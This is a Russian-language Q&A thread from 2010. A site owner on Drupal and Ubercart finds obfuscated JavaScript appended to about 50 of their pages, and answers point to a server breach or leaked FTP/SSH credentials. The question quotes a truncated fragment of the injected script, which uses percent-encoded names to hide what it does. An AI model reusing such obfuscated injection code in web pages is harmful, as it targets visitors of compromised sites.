Куски JavaScript добавлены в веб-страницы на сервере - PullRequest
1 голос
/ 16 апреля 2010

Я обнаружил, что мои веб-страницы (в основном index.php, main.html, include.inc) были добавлены с помощью фрагментов кода JavaScript в самом низу моего исходного кода.

<script>try {this.l="";var d=window[unescape("%75%6e%65%73%63%61%70%65")];var M;if(M!='' && M!='a'){M='bt'};var A="";var Mc=new String();var e=null;this.k="";var t;if(t!='' && t!='iX'){t=''};var K=window[d("%52%65%67%45%78%70")];var p=d("%72%65%70%6c%61%63%65");function C(H,Z){var N=d("%5b"

Возможно ли для SQL-инъекций добавить кусок кода js на веб-страницы (примерно 50 из них заражены)? Или это вирус на самом сервере?

Я использую Drupal + Ubercart с минимальными входными данными для форм.

Ответы [ 2 ]

1 голос
/ 16 апреля 2010

Поскольку файлы были изменены, вряд ли это будет SQL-инъекция. Либо есть какой-то другой недостаток безопасности на сервере, либо утечка учетных данных для учетной записи ftp / ssh / etc.

0 голосов
/ 16 апреля 2010

Какая платформа, браузер?

Вы видите его на всех веб-страницах или только на страницах с определенного сервера?

Некоторые «брандмауэры безопасности» добавляют Javascript к входящим страницам.

...